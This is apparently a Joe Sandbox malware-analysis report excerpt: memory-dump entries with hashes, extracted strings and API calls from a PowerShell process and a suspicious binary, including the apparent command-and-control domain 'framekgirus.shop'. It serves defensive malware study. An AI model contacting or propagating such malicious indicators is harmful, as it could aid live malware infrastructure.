                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ad5527bde84887842bd67ede3af813d3d2bfafa9ce62ce931ca0c762df5fc71c
                                                                                                                  • Instruction ID: bb020e86a6491be264903da0b8abd9a3e7cd9dc447c4c5ef46eccd29f0edee70
                                                                                                                  • Opcode Fuzzy Hash: ad5527bde84887842bd67ede3af813d3d2bfafa9ce62ce931ca0c762df5fc71c
                                                                                                                  • Instruction Fuzzy Hash: 0411C0306083448FD718CF36D994A9ABFF8EF45210B1488EED08ACB6A2DB30EC45CB01
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fb52690df2631b5448480639c65a99879037ce0dc831018a657f2dde6814e9b9
                                                                                                                  • Instruction ID: be59f6e36c8cb48c2d258712eab56a5a728548c3aad358e5677cbd5df3b4b9cd
                                                                                                                  • Opcode Fuzzy Hash: fb52690df2631b5448480639c65a99879037ce0dc831018a657f2dde6814e9b9
                                                                                                                  • Instruction Fuzzy Hash: 26110934204750CFC728DF35D49099AB7F6EF8921572489ADD48A87BA0DB36F845CB50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1726552453.000000000314D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0314D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_314d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 78378fc3bac1815dd73951a784841e442290ff668ded20e13b35768ff8d9c0b8
                                                                                                                  • Instruction ID: 568f1af7b34eb2b8c1d0ef8ba7fb856070d818d198fd4e201ae5850d0372a370
                                                                                                                  • Opcode Fuzzy Hash: 78378fc3bac1815dd73951a784841e442290ff668ded20e13b35768ff8d9c0b8
                                                                                                                  • Instruction Fuzzy Hash: 2F014C6240D3C09FDB128B259C94752BFB8EF57224F1D85DBE8888F1A7C2695C45C772
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e02134732ac3ad3301175ebb540b50c203550b9d93428870c775088cf2387124
                                                                                                                  • Instruction ID: df8bd91bc85a19ba6a2f431e674a8aa583780baddd26e96683469f86b266d37c
                                                                                                                  • Opcode Fuzzy Hash: e02134732ac3ad3301175ebb540b50c203550b9d93428870c775088cf2387124
                                                                                                                  • Instruction Fuzzy Hash: 450181327092A55FD7118A7A9C949ABBFE9EF8661071441BBF845C7262DA70CD04CB60
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1726552453.000000000314D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0314D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_314d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3b83cee816665d86ea48971256b7942f42f4b6dca9d72135064a2c339ebc31da
                                                                                                                  • Instruction ID: 0c6691292b6c235ae4618c51340a554928142a38d13c7f9117ba204163c854a7
                                                                                                                  • Opcode Fuzzy Hash: 3b83cee816665d86ea48971256b7942f42f4b6dca9d72135064a2c339ebc31da
                                                                                                                  • Instruction Fuzzy Hash: 9C01F7310083009BEB10CA25D984767FF98DF49324F1CC56AEC080B147C7799881C6B1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 548e8ef4bfb01fbfca40d817cd8bbc05677e1312839f566cef09b01a21f8b824
                                                                                                                  • Instruction ID: 5b91ee00285fa7b4618efe81b75f3967ed205947a98c4c5406d7cd408dd0c5f6
                                                                                                                  • Opcode Fuzzy Hash: 548e8ef4bfb01fbfca40d817cd8bbc05677e1312839f566cef09b01a21f8b824
                                                                                                                  • Instruction Fuzzy Hash: 89F028343093905FC712C768D88496F7FF4DF8912570406AED049CBAA2CF649C4587A1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e15213b0f01125e65d850f356a62769fd70c84926c68b33dd4633086f11bfbd0
                                                                                                                  • Instruction ID: 9d857f248758d63d71874e9151b0a4298745c4c4e035e507b98e8dc596d2870a
                                                                                                                  • Opcode Fuzzy Hash: e15213b0f01125e65d850f356a62769fd70c84926c68b33dd4633086f11bfbd0
                                                                                                                  • Instruction Fuzzy Hash: 860126795043049FD301DF28D4547DA7B65EF86308F24405BC5458F396DF35680ACBA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1726552453.000000000314D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0314D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_314d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 98c1efd3f9d79dcb88dc11798dc970fe133eb7fc81012c00a949cc6ba81baa6e
                                                                                                                  • Instruction ID: 29bc08e0ac193eecef2f4da7edc9e3b1531fb82f92cd00afe8d431b564e1161d
                                                                                                                  • Opcode Fuzzy Hash: 98c1efd3f9d79dcb88dc11798dc970fe133eb7fc81012c00a949cc6ba81baa6e
                                                                                                                  • Instruction Fuzzy Hash: E5F0FF76200600AFD724CF0AD984C27FBADEFD4770319C55AE84A5B626C771EC42CEA0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 71f61c001376fe685d35704cd2afa56e7e78576358624ec51c84168558ea85af
                                                                                                                  • Instruction ID: b6f1af5506e1bfb951aecbead93760c2e2acee5bac39d6e36a8d2d6d584cf04a
                                                                                                                  • Opcode Fuzzy Hash: 71f61c001376fe685d35704cd2afa56e7e78576358624ec51c84168558ea85af
                                                                                                                  • Instruction Fuzzy Hash: EAF08C397042418FC3108F2DD89886ABBFAEFDA61432950DAE184CB376DA61DC11CB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f9e84b913ed01fcaef20e846cf95a0943af3d340c9bdd46a24601215e2f0c7f4
                                                                                                                  • Instruction ID: 2ebfccf19e63c1b99deef01dafd3a4ee72e3163ab5a49764ec8e54f8a407aced
                                                                                                                  • Opcode Fuzzy Hash: f9e84b913ed01fcaef20e846cf95a0943af3d340c9bdd46a24601215e2f0c7f4
                                                                                                                  • Instruction Fuzzy Hash: 49F0A0357007159FD724EA6AE884A6FB7E9EB88665B00092DE10AC7B40DF34AC4287A4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1726552453.000000000314D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0314D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_314d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1f49005289b79114244a9d538150afa80780d066e7d04b5d3eee502071705334
                                                                                                                  • Instruction ID: 05a51f2fc3ca65a2d2b8121c2ea93dcc813797ca19255185a0fee4f829cf2226
                                                                                                                  • Opcode Fuzzy Hash: 1f49005289b79114244a9d538150afa80780d066e7d04b5d3eee502071705334
                                                                                                                  • Instruction Fuzzy Hash: 0BF0F975100A40AFD725CF06C984D23BBB9EB99620B19859DE85A5B322C731FC42CFA0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b79b236586223a2e062320f4c13e138ff8f5c997d721cbc9b6cdacdc00726d89
                                                                                                                  • Instruction ID: 106af30848a4c77e8b74fbff50b9381e9804bbbc6c0561db0cc3f23c9dece696
                                                                                                                  • Opcode Fuzzy Hash: b79b236586223a2e062320f4c13e138ff8f5c997d721cbc9b6cdacdc00726d89
                                                                                                                  • Instruction Fuzzy Hash: 50F027B9A002049BE304EF69D0087DF77AADBC5718F10852ACA194B388CF396C05CBD0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a1f93ec447ba36f4ded159958918cac32289b4d6441f712566947ccce136946f
                                                                                                                  • Instruction ID: be0d3e1acbe5df5bb206ab761609d3c52cad3b44c9f99e764010d5b77f17746e
                                                                                                                  • Opcode Fuzzy Hash: a1f93ec447ba36f4ded159958918cac32289b4d6441f712566947ccce136946f
                                                                                                                  • Instruction Fuzzy Hash: F9F0E5397002148FCB10DB6CDC40A9ABBE6EBCC7557198195E809CB328DF34CC028B90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 33cbb44161d7afadfe2b753f14058267c39a3ffff6245c8faa7b7e086eaf2fbd
                                                                                                                  • Instruction ID: c6538c6451464bb5ff073129b237ffffbb3b4cbce43b6f3ccb0f3f06481c7234
                                                                                                                  • Opcode Fuzzy Hash: 33cbb44161d7afadfe2b753f14058267c39a3ffff6245c8faa7b7e086eaf2fbd
                                                                                                                  • Instruction Fuzzy Hash: 87F0B8745093008FD360CB78D8A83EABFF0FB04300F5448AAC18AC7286EB386894CB40
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 57bb29bfb5e5943d038c30dd4796c26cda4dfbc762d2ad17c1c0de675b601965
                                                                                                                  • Instruction ID: f27aa6ea92d1ec7a537528a1f0af8d4858132345105e60643f9ceedf72509d89
                                                                                                                  • Opcode Fuzzy Hash: 57bb29bfb5e5943d038c30dd4796c26cda4dfbc762d2ad17c1c0de675b601965
                                                                                                                  • Instruction Fuzzy Hash: 38E0E5357001118F8610DB1ED898C2AB7FAEFDE66571940AAE549CB735DA61EC01CB90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 22e507045309b1bcbef4c41319c7261a60522be378da5e5b09bab3041d9c4fa2
                                                                                                                  • Instruction ID: 2e7dd7e38bf38bb7aa8e5c522a2d4469c66b0c3c136402acd43057b6f4c98bf7
                                                                                                                  • Opcode Fuzzy Hash: 22e507045309b1bcbef4c41319c7261a60522be378da5e5b09bab3041d9c4fa2
                                                                                                                  • Instruction Fuzzy Hash: 6CE0D8357083965B8716D22DAC90495FFBFCFC352031881BBF140CF246EF11881683A2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 991ade7c0250e1b629df6bb5f3a8abaa9e897cec6929453dd08a396a7b896539
                                                                                                                  • Instruction ID: 55edcc95a0b9a5103b5a708c945d143144202a3acea55e8b4c66f6db2168d253
                                                                                                                  • Opcode Fuzzy Hash: 991ade7c0250e1b629df6bb5f3a8abaa9e897cec6929453dd08a396a7b896539
                                                                                                                  • Instruction Fuzzy Hash: EDF0E5357086619BC7096B74A80D2DD7F66AFC4214F04402BD61947282CF7C191183D6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 30cccfdfe7c079c5793a74b5aeaa000ec38ccc7689745fa89d4dffc5c6b4208b
                                                                                                                  • Instruction ID: bc460753fbc8b8bcc4865729485586c08532d8e5165a357da84862bcd339d211
                                                                                                                  • Opcode Fuzzy Hash: 30cccfdfe7c079c5793a74b5aeaa000ec38ccc7689745fa89d4dffc5c6b4208b
                                                                                                                  • Instruction Fuzzy Hash: 5DF0ED749003049FD764DB79D89D79A7BE9FB44310F14446AD55ED7384DB3968808B90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1c3d1e87a283a366739edd336aae27f567862f48ceaa5d1a3f9720a1da14b70f
                                                                                                                  • Instruction ID: e3875feb84802c0399096cdfd6f4f04ad8fd3c23204cf49075f8961c53ea45c4
                                                                                                                  • Opcode Fuzzy Hash: 1c3d1e87a283a366739edd336aae27f567862f48ceaa5d1a3f9720a1da14b70f
                                                                                                                  • Instruction Fuzzy Hash: 8EE0125AF012262B4664F5BD5CD47B6A6DF8EC949470980769B05CF745EF60CC0543E2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e8b42542327813aa748e4c7473f433fdddef09b994d0f840c6501e97adeb7bcc
                                                                                                                  • Instruction ID: 2122c66ff5facabddea26c1ec31986b4e25f430ad665e72477d030629d5e9526
                                                                                                                  • Opcode Fuzzy Hash: e8b42542327813aa748e4c7473f433fdddef09b994d0f840c6501e97adeb7bcc
                                                                                                                  • Instruction Fuzzy Hash: 7CE026397046208BCB0D3B75A80C2AE7E5AFBC4720F04002BD61A87380CF7C6C1183E9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6276c0c88433f07a4f33e2e3a0f464e2efca8efc2ee5bc07f3fdad5725c6ae1a
                                                                                                                  • Instruction ID: 85ce0ae3291ed49c82bd0457107db2fefb3b415138a95367017802bfe47a0f95
                                                                                                                  • Opcode Fuzzy Hash: 6276c0c88433f07a4f33e2e3a0f464e2efca8efc2ee5bc07f3fdad5725c6ae1a
                                                                                                                  • Instruction Fuzzy Hash: BAD05E56F022292F4564F0BE5C947BB91CF8AC94A470980769B0ACF649EF60CC0243E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                  • Instruction ID: 77db688698e21bdeaaadb504ca0fb163c48c504121197fb44bff2d33a1415fb0
                                                                                                                  • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                  • Instruction Fuzzy Hash: 79E08631B100149B8B08DA59D4504EDF7AADFCC220F04C07AD90AA7740DA32591587E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f2d39f2ac590859eb4be25425cf1977e2ad3816e1712344deefb13409fc4e6cf
                                                                                                                  • Instruction ID: 05c402ac18f3613208d025b4b42dc682c5b95187ca982f5fa108320a1384d5e8
                                                                                                                  • Opcode Fuzzy Hash: f2d39f2ac590859eb4be25425cf1977e2ad3816e1712344deefb13409fc4e6cf
                                                                                                                  • Instruction Fuzzy Hash: ABE01A3080420A8BCB08EF64E44A8ADFF74FF14301B4041AAE54282190EF305A5ACB85
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dc2879d362a2b3ac72734f829156be01fafa53986d32d8a9d884f585581ccb3d
                                                                                                                  • Instruction ID: 0defe59860eb384549dbc0c5cb3d3f1bb9cce5c39ed58831b91e8400af0cbdd3
                                                                                                                  • Opcode Fuzzy Hash: dc2879d362a2b3ac72734f829156be01fafa53986d32d8a9d884f585581ccb3d
                                                                                                                  • Instruction Fuzzy Hash: 01E09A70D0424A8FCB40DFBCC481659FFF0EB4A200B2082AEC918DB205E3324651CB82
Strings
Memory Dump Source
• Source File: 00000005.00000002.1744520260.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7870000_powershell.jbxd
Similarity
• API ID:
• String ID: $ctk$4'kq$4'kq$4'kq$4'kq$piIk$tPkq$tPkq$$kq$$kq
• API String ID: 0-2862391241
• Opcode ID: dcdd8f9f719be023563b867fe20db242a9d96fb4a9922fd5921a8868c7e26422
• Instruction ID: 629504d75313dca173c346a8f5b617e76a18fe2b791e05c7c23fb9a1bd171c74
• Opcode Fuzzy Hash: dcdd8f9f719be023563b867fe20db242a9d96fb4a9922fd5921a8868c7e26422
• Instruction Fuzzy Hash: DFE159B1F0430A8FC7219F68980866BBBF2AFE5311F28847BD516CB655DB35C885C7A1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1744520260.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7870000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $kq$$kq$$kq$$kq
                                                                                                                  • API String ID: 0-2881790790
                                                                                                                  • Opcode ID: 36e0188623726f8592bdcf341d54d12ef302189639cd179da508e19cd97768ce
                                                                                                                  • Instruction ID: be3df4e1c5fc6116b992308498fa9da1aaaaf63ea42bb7189133022518dcc639
                                                                                                                  • Opcode Fuzzy Hash: 36e0188623726f8592bdcf341d54d12ef302189639cd179da508e19cd97768ce
                                                                                                                  • Instruction Fuzzy Hash: EF217BB231430A9BDB74AD3A9800737BBDBABE0715F24883AA507CB785DD79D851C361
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1744520260.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7870000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'kq$4'kq$$kq$$kq
                                                                                                                  • API String ID: 0-1727931526
                                                                                                                  • Opcode ID: eb1c5cdfc1c187a5c5d1adc7a8e2b18faaf74caa4a6dad2bff4d1ed1a81db1b9
                                                                                                                  • Instruction ID: 2b8225154b6b61b6b3a56e2c8b299436e34c1dfa46551471f1fe49a55b3f01a3
                                                                                                                  • Opcode Fuzzy Hash: eb1c5cdfc1c187a5c5d1adc7a8e2b18faaf74caa4a6dad2bff4d1ed1a81db1b9
                                                                                                                  • Instruction Fuzzy Hash: D201F56160D3C78FC73B563859202656FF26FA3150B2A04ABD082CF397CA18DC0AC3A7

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:17.3%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:12.4%
                                                                                                                  Total number of Nodes:315
                                                                                                                  Total number of Limit Nodes:18

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00AE8B9D
                                                                                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00AE8EFA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000007.00000002.2034752671.0000000000AB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000AF5000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C48000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C68000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ab0000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BlanketInformationProxyVolume
                                                                                                                  • String ID: ,./,$S$]E$]E$b>c<$k2`0$x;
                                                                                                                  • API String ID: 3048927609-4038474941
                                                                                                                  • Opcode ID: 064d01a10d34db0762b0fc01829a44f1d6a37bf85a4d8a17215ad2fe1b640d10
                                                                                                                  • Instruction ID: aca3340354064373e63bad1152c511efab2db1f64fbee58420b1c31c153813cb
                                                                                                                  • Opcode Fuzzy Hash: 064d01a10d34db0762b0fc01829a44f1d6a37bf85a4d8a17215ad2fe1b640d10
                                                                                                                  • Instruction Fuzzy Hash: A22210766083419BD310CF69C885B6BBBE5FFC5304F14892DF5999B2A0DB79D805CB82

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000007.00000002.2034752671.0000000000AB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000AF5000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C48000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C68000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ab0000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Uninitialize
                                                                                                                  • String ID: .a]b$GK8m$LM$T_RE$framekgirus.shop$iped$wtf|
                                                                                                                  • API String ID: 3861434553-152157548
                                                                                                                  • Opcode ID: e56f50f46c1c88dae8460cd48a33080a553b71aae014a94340f1b6e80efae3a5
                                                                                                                  • Instruction ID: efe3a476706d4699e9828a0d92ce15579b6d4479a32893c618bfa13349acffea
                                                                                                                  • Opcode Fuzzy Hash: e56f50f46c1c88dae8460cd48a33080a553b71aae014a94340f1b6e80efae3a5
                                                                                                                  • Instruction Fuzzy Hash: 13B123756493C18BD335CF69C8903EFBBE1ABE7310F18896DD4D94B242C77989068B92

                                                                                                                  Control-flow Graph

APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00AD31F3
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00AD32A2
Strings
Memory Dump Source
• Source File: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000007.00000002.2034752671.0000000000AB0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2034770588.0000000000AF5000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2034770588.0000000000C48000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmp
